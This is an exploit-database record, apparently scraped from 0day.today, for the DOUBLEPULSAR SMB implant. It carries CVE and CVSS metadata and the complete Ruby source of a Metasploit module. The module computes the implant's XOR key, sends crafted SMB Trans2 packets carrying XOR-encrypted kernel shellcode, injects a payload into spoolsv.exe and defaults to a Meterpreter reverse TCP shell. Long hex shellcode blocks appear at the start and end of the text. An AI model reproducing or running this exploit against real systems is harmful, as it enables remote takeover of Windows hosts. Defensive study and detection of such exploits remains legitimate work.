\"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-03] #"}, "lastseen": "2021-09-02T22:14:33", "differentElements": ["sourceData"], "edition": 5}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "8c0a430cef407e0d779fcb8ffb732822", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-03T22:12:36", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:142602", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "rapid7community", 
"idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27803"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42030", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96704", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", 
"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-03T22:12:36", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-03T22:12:36", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => 
true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" 